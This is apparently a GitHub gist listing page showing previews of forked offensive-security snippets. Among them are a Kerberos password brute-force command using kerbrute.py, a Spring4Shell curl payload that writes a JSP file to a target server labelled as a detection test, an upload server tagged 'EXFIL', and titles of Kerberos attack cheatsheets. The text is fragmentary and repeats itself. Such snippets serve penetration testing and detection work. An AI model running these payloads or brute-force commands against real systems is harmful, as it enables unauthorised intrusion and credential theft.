With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
AceIzWild
AceIzWild
/ spring4shell.sh
Created
August 26, 2023 15:08
— forked from TarlogicSecurity/spring4shell.sh
Testing for Spring4Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -v -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20Tarlogic 2022%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tarlogicCheckSpring4Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://YOURSERVER/ | |
| curl http://YOURSERVER/tarlogicCheckSpring4Shell.jsp |
AceIzWild
/ SimpleHTTPServerWithUpload.py
Created
August 26, 2023 07:08
— forked from UniIsland/SimpleHTTPServerWithUpload.py
EXFIL - Simple Python Http Server with Upload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
AceIzWild
/ kerberos_attacks_cheatsheet.md
Created
May 7, 2023 03:26
— forked from jivoi/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
AceIzWild
/ kerberos_attacks_cheatsheet.md
Created
November 4, 2022 13:40
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: